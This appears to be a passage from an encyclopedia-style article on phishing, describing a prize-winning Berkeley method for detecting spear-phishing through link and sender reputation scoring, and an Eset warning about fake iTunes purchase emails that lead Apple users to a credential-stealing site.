In August 2017, the social network Facebook announced the winner of the 2017 Internet Defense Prize contest. A team of researchers from the University of California, Berkeley, and Lawrence Berkeley National Laboratory earned a $100,000 reward for inventing a new technique for detecting targeted phishing attacks (spear-phishing) in a corporate environment.
The method presented in the framework of USENIX Security Symposium combines a new anomaly assessment technique for building a rating of security notifications and the functionality of analyzing targeted phishing email messages.
To test their method, the researchers analyzed more than 370 million email messages received by employees of large companies between March 2013 and January 2017.
The first part of the discovery of targeted phishing relies on the analysis of two main components: the reputation of the domain and the reputation of the sender. The reputation of the domain is performed by checking the reputation of the link in the letter. A link is considered dangerous if it was not visited by many employees of the company, or if activity on the link began very recently.
The Sender Reputation Check feature tries to find out if the email fields are fake, such as the sender's name and the From header.
After the analysis, the system should decide on the basis of the collected data and, if necessary, create a hazard notification. The system proposed by scientists is called the direct assessment of anomalies - 'Directed Anomaly Scoring (DAS)'. It consists in determining the suspicion of each event with respect to other events. After analyzing all events, DAS selects the highest rated events and reports them to the security service.
According to experts, the new technology is able to detect 17 of 19 phishing letters, and the number of false positives is only 0.005%[20].
Fraudsters attack users of Apple devices under the guise of employees iTunes
On July 17, Eset warned users of Apple products about a new scam. Fraudsters collect bank card data and other personal information by sending letters about a non-existent purchase to the iTunes Store.
A potential victim receives a letter from an online store stating that Apple ID was used on an unknown device to buy Rihanna's album. The user is invited to ignore the message, thereby confirming the purchase, or cancel the transaction by clicking on the link.
If the user does not pay attention to grammatical errors in the letter and the fact that the sender's address is not related to Apple, he gets to the phishing site, where he is invited to enter an Apple ID and password, and then fill out a questionnaire "to confirm his identity."